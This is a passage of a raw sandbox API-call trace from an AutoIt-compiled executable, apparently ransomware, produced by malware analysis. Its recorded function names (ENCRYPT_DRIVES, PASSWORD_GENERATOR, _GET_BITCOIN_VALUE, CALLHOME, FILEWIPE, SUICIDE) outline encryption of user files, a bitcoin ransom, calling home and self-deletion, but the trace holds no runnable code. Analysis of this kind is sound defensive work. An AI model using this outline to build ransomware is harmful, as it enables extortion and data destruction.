lpsz="_CRYPT_DECRYPTFILE") returned 0x12 [0245.329] CharUpperBuffW (in: lpsz="_CRYPT_DECRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_DECRYPTFILE") returned 0x12 [0245.329] CharUpperBuffW (in: lpsz="_CRYPT_DECRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_DECRYPTDATA") returned 0x12 [0245.329] CharUpperBuffW (in: lpsz="_CRYPT_DECRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_DECRYPTDATA") returned 0x12 [0245.329] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0245.329] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0245.329] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0245.329] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0245.329] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0245.329] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0245.329] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0245.329] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0245.329] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0245.330] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0245.330] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0245.330] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0245.330] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0245.330] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0245.330] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0245.330] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0245.330] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0245.330] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0245.330] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0245.330] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0245.330] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0245.330] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0245.330] CharUpperBuffW (in: lpsz="START_THE_SHOW", cchLength=0xe | out: lpsz="START_THE_SHOW") returned 0xe [0245.331] CharUpperBuffW (in: lpsz="START_THE_SHOW", cchLength=0xe | out: lpsz="START_THE_SHOW") returned 0xe [0245.331] CharUpperBuffW (in: lpsz="ENCRYPT_DRIVES", cchLength=0xe | out: lpsz="ENCRYPT_DRIVES") returned 0xe [0245.331] CharUpperBuffW (in: lpsz="ENCRYPT_DRIVES", cchLength=0xe | out: lpsz="ENCRYPT_DRIVES") returned 0xe [0245.331] CharUpperBuffW (in: lpsz="DECRYPT_DRIVES", cchLength=0xe | out: lpsz="DECRYPT_DRIVES") returned 0xe [0245.331] CharUpperBuffW (in: lpsz="DECRYPT_DRIVES", cchLength=0xe | out: lpsz="DECRYPT_DRIVES") returned 0xe [0245.331] CharUpperBuffW (in: lpsz="ENCRYPT_USERPROFILES", cchLength=0x14 | out: lpsz="ENCRYPT_USERPROFILES") returned 0x14 [0245.331] CharUpperBuffW (in: lpsz="ENCRYPT_USERPROFILES", cchLength=0x14 | out: lpsz="ENCRYPT_USERPROFILES") returned 0x14 [0245.331] CharUpperBuffW (in: lpsz="DECRYPT_USERPROFILES", cchLength=0x14 | out: lpsz="DECRYPT_USERPROFILES") returned 0x14 [0245.331] CharUpperBuffW (in: lpsz="DECRYPT_USERPROFILES", cchLength=0x14 | out: lpsz="DECRYPT_USERPROFILES") returned 0x14 [0245.331] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0245.331] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0245.331] CharUpperBuffW (in: lpsz="_DECRYPT", cchLength=0x8 | out: lpsz="_DECRYPT") returned 0x8 [0245.331] CharUpperBuffW (in: lpsz="_DECRYPT", cchLength=0x8 | out: lpsz="_DECRYPT") returned 0x8 [0245.332] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0245.332] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0245.332] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0245.332] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0245.332] CharUpperBuffW (in: lpsz="_RUNCMD", cchLength=0x7 | out: lpsz="_RUNCMD") returned 0x7 [0245.332] CharUpperBuffW (in: lpsz="_RUNCMD", cchLength=0x7 | out: lpsz="_RUNCMD") returned 0x7 [0245.332] CharUpperBuffW (in: lpsz="TRUE_HOMEDRIVE", cchLength=0xe | out: lpsz="TRUE_HOMEDRIVE") returned 0xe [0245.332] CharUpperBuffW (in: lpsz="TRUE_HOMEDRIVE", cchLength=0xe | out: lpsz="TRUE_HOMEDRIVE") returned 0xe [0245.332] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0245.332] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0245.332] CharUpperBuffW (in: lpsz="RESTARTSCRIPT", cchLength=0xd | out: lpsz="RESTARTSCRIPT") returned 0xd [0245.332] CharUpperBuffW (in: lpsz="RESTARTSCRIPT", cchLength=0xd | out: lpsz="RESTARTSCRIPT") returned 0xd [0245.332] CharUpperBuffW (in: lpsz="_ASH_USERKEY_DETECT", cchLength=0x13 | out: lpsz="_ASH_USERKEY_DETECT") returned 0x13 [0245.333] CharUpperBuffW (in: lpsz="_ASH_USERKEY_DETECT", cchLength=0x13 | out: lpsz="_ASH_USERKEY_DETECT") returned 0x13 [0245.333] CharUpperBuffW (in: lpsz="SUICIDE", cchLength=0x7 | out: lpsz="SUICIDE") returned 0x7 [0245.333] CharUpperBuffW (in: lpsz="SUICIDE", cchLength=0x7 | out: lpsz="SUICIDE") returned 0x7 [0245.333] CharUpperBuffW (in: lpsz="STARTUP", cchLength=0x7 | out: lpsz="STARTUP") returned 0x7 [0245.333] CharUpperBuffW (in: lpsz="STARTUP", cchLength=0x7 | out: lpsz="STARTUP") returned 0x7 [0245.333] CharUpperBuffW (in: lpsz="PASSWORD_GENERATOR", cchLength=0x12 | out: lpsz="PASSWORD_GENERATOR") returned 0x12 [0245.333] CharUpperBuffW (in: lpsz="PASSWORD_GENERATOR", cchLength=0x12 | out: lpsz="PASSWORD_GENERATOR") returned 0x12 [0245.333] CharUpperBuffW (in: lpsz="PASTEBIN", cchLength=0x8 | out: lpsz="PASTEBIN") returned 0x8 [0245.333] CharUpperBuffW (in: lpsz="PASTEBIN", cchLength=0x8 | out: lpsz="PASTEBIN") returned 0x8 [0245.333] CharUpperBuffW (in: lpsz="_GET_BITCOIN_VALUE", cchLength=0x12 | out: lpsz="_GET_BITCOIN_VALUE") returned 0x12 [0245.333] CharUpperBuffW (in: lpsz="_GET_BITCOIN_VALUE", cchLength=0x12 | out: lpsz="_GET_BITCOIN_VALUE") returned 0x12 [0245.333] CharUpperBuffW (in: lpsz="_GUICTRLEDIT_SETLIMITTEXT", cchLength=0x19 | out: lpsz="_GUICTRLEDIT_SETLIMITTEXT") returned 0x19 [0245.333] CharUpperBuffW (in: lpsz="_GUICTRLEDIT_SETLIMITTEXT", cchLength=0x19 | out: lpsz="_GUICTRLEDIT_SETLIMITTEXT") returned 0x19 [0245.333] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0245.334] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0245.334] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0245.334] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0245.334] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEMAPPING", cchLength=0x19 | out: lpsz="_WINAPI_CREATEFILEMAPPING") returned 0x19 [0245.334] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEMAPPING", cchLength=0x19 | out: lpsz="_WINAPI_CREATEFILEMAPPING") returned 0x19 [0245.335] CharUpperBuffW (in: lpsz="_WINAPI_MAPVIEWOFFILE", cchLength=0x15 | out: lpsz="_WINAPI_MAPVIEWOFFILE") returned 0x15 [0245.335] CharUpperBuffW (in: lpsz="_WINAPI_MAPVIEWOFFILE", cchLength=0x15 | out: lpsz="_WINAPI_MAPVIEWOFFILE") returned 0x15 [0245.335] CharUpperBuffW (in: lpsz="_WINAPI_UNMAPVIEWOFFILE", cchLength=0x17 | out: lpsz="_WINAPI_UNMAPVIEWOFFILE") returned 0x17 [0245.335] CharUpperBuffW (in: lpsz="_WINAPI_UNMAPVIEWOFFILE", cchLength=0x17 | out: lpsz="_WINAPI_UNMAPVIEWOFFILE") returned 0x17 [0245.335] CharUpperBuffW (in: lpsz="_SINGLETON", cchLength=0xa | out: lpsz="_SINGLETON") returned 0xa [0245.335] CharUpperBuffW (in: lpsz="_SINGLETON", cchLength=0xa | out: lpsz="_SINGLETON") returned 0xa [0245.335] CharUpperBuffW (in: lpsz="_FILECOUNTLINES", cchLength=0xf | out: lpsz="_FILECOUNTLINES") returned 0xf [0245.335] CharUpperBuffW (in: lpsz="_FILECOUNTLINES", cchLength=0xf | out: lpsz="_FILECOUNTLINES") returned 0xf [0245.335] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0245.335] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0245.335] CharUpperBuffW (in: lpsz="DOMAINCHECK", cchLength=0xb | out: lpsz="DOMAINCHECK") returned 0xb [0245.335] CharUpperBuffW (in: lpsz="DOMAINCHECK", cchLength=0xb | out: lpsz="DOMAINCHECK") returned 0xb [0245.335] CharUpperBuffW (in: lpsz="_WINAPI_NETGETJOININFORMATION", cchLength=0x1d | out: lpsz="_WINAPI_NETGETJOININFORMATION") returned 0x1d [0245.336] CharUpperBuffW (in: lpsz="_WINAPI_NETGETJOININFORMATION", cchLength=0x1d | out: lpsz="_WINAPI_NETGETJOININFORMATION") returned 0x1d [0245.336] CharUpperBuffW (in: lpsz="_BUFFERSIZE", cchLength=0xb | out: lpsz="_BUFFERSIZE") returned 0xb [0245.336] CharUpperBuffW (in: lpsz="_BUFFERSIZE", cchLength=0xb | out: lpsz="_BUFFERSIZE") returned 0xb [0245.336] CharUpperBuffW (in: lpsz="CALLHOME", cchLength=0x8 | out: lpsz="CALLHOME") returned 0x8 [0245.336] CharUpperBuffW (in: lpsz="CALLHOME", cchLength=0x8 | out: lpsz="CALLHOME") returned 0x8 [0245.336] CharUpperBuffW (in: lpsz="MYERRFUNC", cchLength=0x9 | out: lpsz="MYERRFUNC") returned 0x9 [0245.336] CharUpperBuffW (in: lpsz="MYERRFUNC", cchLength=0x9 | out: lpsz="MYERRFUNC") returned 0x9 [0245.336] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\testers.exe", nBufferLength=0x7fff, lpBuffer=0x8af9d0, lpFilePart=0x8bf9d4 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\testers.exe", lpFilePart=0x8bf9d4*="testers.exe") returned 0x2f [0245.336] CheckTokenMembership (in: TokenHandle=0x0, SidToCheck=0xc054c8*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x8bf9dc | out: IsMember=0x8bf9dc) returned 1 [0245.337] GetSysColorBrush (nIndex=15) returned 0x1100059 [0245.337] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0245.337] LoadIconW (hInstance=0x290000, lpIconName=0x63) returned 0x40179 [0245.337] LoadIconW (hInstance=0x290000, lpIconName=0xa4) returned 0x5010b [0245.338] LoadIconW (hInstance=0x290000, lpIconName=0xa2) returned 0x400d9 [0245.339] LoadImageW (hInst=0x290000, name=0x63, type=0x1, cx=16, cy=16, fuLoad=0x0) returned 0x3017b [0245.339] RegisterClassExW (param_1=0x8bf9ac) returned 0xc12b [0245.339] GetSysColorBrush (nIndex=15) returned 0x1100059 [0245.339] RegisterClassExW (param_1=0x8bf950) returned 0xc11f [0245.339] RegisterClipboardFormatW (lpszFormat="TaskbarCreated") returned 0xc0c2 [0245.339] InitCommonControlsEx (picce=0x8bf980) returned 1 [0245.340] ImageList_Create (cx=16, cy=16, flags=0x21, cInitial=1, cGrow=1) returned 0xc1cbd0 [0245.341] LoadIconW (hInstance=0x290000, lpIconName=0xa9) returned 0x3014d [0245.341] ImageList_ReplaceIcon (himl=0xc1cbd0, i=-1, hicon=0x3014d) returned 0 [0245.343] CreateWindowExW (dwExStyle=0x0, lpClassName="AutoIt v3", lpWindowName="AutoIt v3", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=300, nHeight=100, hWndParent=0x0, hMenu=0x0, hInstance=0x290000, lpParam=0x0) returned 0x5014a [0245.343] NtdllDefWindowProc_W () returned 0x0 [0245.343] NtdllDefWindowProc_W () returned 0x1 [0245.346] NtdllDefWindowProc_W () returned 0x0 [0245.350] SetTimer (hWnd=0x5014a, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0245.350] RegisterClipboardFormatW (lpszFormat="TaskbarCreated") returned 0xc0c2 [0245.350] CreatePopupMenu () returned 0x1b013b [0245.350] CreateWindowExW (dwExStyle=0x0, lpClassName="edit", lpWindowName=0x0, dwStyle=0x50b008c4, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x5014a, hMenu=0x1, hInstance=0x290000, lpParam=0x0) returned 0x2014c [0245.366] NtdllDefWindowProc_W () returned 0x0 [0245.366] ShowWindow (hWnd=0x5014a, nCmdShow=0) returned 0 [0245.366] ShowWindow (hWnd=0x5014a, nCmdShow=0) returned 0 [0245.366] Shell_NotifyIconW (dwMessage=0x0, lpData=0x8bf628) returned 1 [0245.395] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20a) returned 0xc1d660 [0245.395] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xcf5cf0 [0245.395] Shell_NotifyIconW (dwMessage=0x1, lpData=0x8bf258) returned 1 [0245.396] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc1d660 | out: hHeap=0xbe0000) returned 1 [0245.396] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf5cf0 | out: hHeap=0xbe0000) returned 1 [0245.396] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0245.396] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0245.396] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xcf5cf0 [0245.396] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xce9c70 [0245.396] CharUpperBuffW (in: lpsz="_FO_FILESEARCH", cchLength=0xe | out: lpsz="_FO_FILESEARCH") returned 0xe [0245.396] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xce9c70 | out: hHeap=0xbe0000) returned 1 [0245.396] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf5cf0 | out: hHeap=0xbe0000) returned 1 [0245.396] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0245.396] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xcf5cf0 [0245.396] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x30) returned 0xcfee10 [0245.397] CharUpperBuffW (in: lpsz="_FO_FOLDERSEARCH", cchLength=0x10 | out: lpsz="_FO_FOLDERSEARCH") returned 0x10 [0245.397] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfee10 | out: hHeap=0xbe0000) returned 1 [0245.397] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf5cf0 | out: hHeap=0xbe0000) returned 1 [0245.397] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0245.397] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xcf5cf0 [0245.397] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x30) returned 0xcfee10 [0245.397] CharUpperBuffW (in: lpsz="__FO_FOLDERSEARCHMASK", cchLength=0x15 | out: lpsz="__FO_FOLDERSEARCHMASK") returned 0x15 [0245.397] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfee10 | out: hHeap=0xbe0000) returned 1 [0245.397] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf5cf0 | out: hHeap=0xbe0000) returned 1 [0245.397] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0245.397] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xcf5cf0 [0245.397] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x30) returned 0xcfee10 [0245.397] CharUpperBuffW (in: lpsz="__FO_FOLDERSEARCH", cchLength=0x11 | out: lpsz="__FO_FOLDERSEARCH") returned 0x11 [0245.397] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfee10 | out: hHeap=0xbe0000) returned 1 [0245.397] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf5cf0 | out: hHeap=0xbe0000) returned 1 [0245.397] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0245.397] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xcf5cf0 [0245.397] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x30) returned 0xcfee10 [0245.397] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0245.397] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfee10 | out: hHeap=0xbe0000) returned 1 [0245.397] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf5cf0 | out: hHeap=0xbe0000) returned 1 [0245.397] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0245.397] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xcf5cf0 [0245.397] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x30) returned 0xcfee10 [0245.397] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0245.397] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfee10 | out: hHeap=0xbe0000) returned 1 [0245.398] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf5cf0 | out: hHeap=0xbe0000) returned 1 [0245.398] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0245.398] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xcf5cf0 [0245.398] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x30) returned 0xcfee10 [0245.398] CharUpperBuffW (in: lpsz="__FO_GETLISTMASK", cchLength=0x10 | out: lpsz="__FO_GETLISTMASK") returned 0x10 [0245.398] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfee10 | out: hHeap=0xbe0000) returned 1 [0245.398] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf5cf0 | out: hHeap=0xbe0000) returned 1 [0245.398] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0245.398] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xcf5cf0 [0245.398] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x30) returned 0xcfee10 [0245.398] CharUpperBuffW (in: lpsz="__FO_FILESEARCHTYPE", cchLength=0x13 | out: lpsz="__FO_FILESEARCHTYPE") returned 0x13 [0245.398] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfee10 | out: hHeap=0xbe0000) returned 1 [0245.398] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf5cf0 | out: hHeap=0xbe0000) returned 1 [0245.398] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0245.398] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xcf5cf0 [0245.398] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x30) returned 0xcfee10 [0245.398] CharUpperBuffW (in: lpsz="__FO_FILESEARCHMASK", cchLength=0x13 | out: lpsz="__FO_FILESEARCHMASK") returned 0x13 [0245.398] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfee10 | out: hHeap=0xbe0000) returned 1 [0245.398] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf5cf0 | out: hHeap=0xbe0000) returned 1 [0245.398] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0245.398] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xcf5cf0 [0245.398] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xce9c70 [0245.398] CharUpperBuffW (in: lpsz="__FO_USERLOCALE", cchLength=0xf | out: lpsz="__FO_USERLOCALE") returned 0xf [0245.398] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xce9c70 | out: hHeap=0xbe0000) returned 1 [0245.398] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf5cf0 | out: hHeap=0xbe0000) returned 1 [0245.399] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0245.399] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9388 [0245.399] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9340 [0245.399] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xcf5cf0 [0245.399] RtlSizeHeap (HeapHandle=0xbe0000, Flags=0x0, MemoryPointer=0xc03138) returned 0x80 [0245.399] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xce9c70 [0245.399] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9310 [0245.399] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xcf5d00 [0245.399] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9310 | out: hHeap=0xbe0000) returned 1 [0245.399] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xce9c98 [0245.399] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9310 [0245.399] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9250 [0245.399] RtlSizeHeap (HeapHandle=0xbe0000, Flags=0x0, MemoryPointer=0xc03138) returned 0x80 [0245.400] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xcf5d10 [0245.400] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9250 | out: hHeap=0xbe0000) returned 1 [0245.400] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf5d10 | out: hHeap=0xbe0000) returned 1 [0245.400] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0245.400] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xce9cc0 [0245.400] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9250 [0245.400] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xcf5d10 [0245.400] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9250 | out: hHeap=0xbe0000) returned 1 [0245.400] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xce9ce8 [0245.400] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9250 [0245.400] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9238 [0245.400] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xcf5d20 [0245.400] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9238 | out: hHeap=0xbe0000) returned 1 [0245.400] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf5d20 | out: hHeap=0xbe0000) returned 1 [0245.400] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0245.400] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xce9d10 [0245.400] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9238 [0245.400] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xcf5d20 [0245.400] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9238 | out: hHeap=0xbe0000) returned 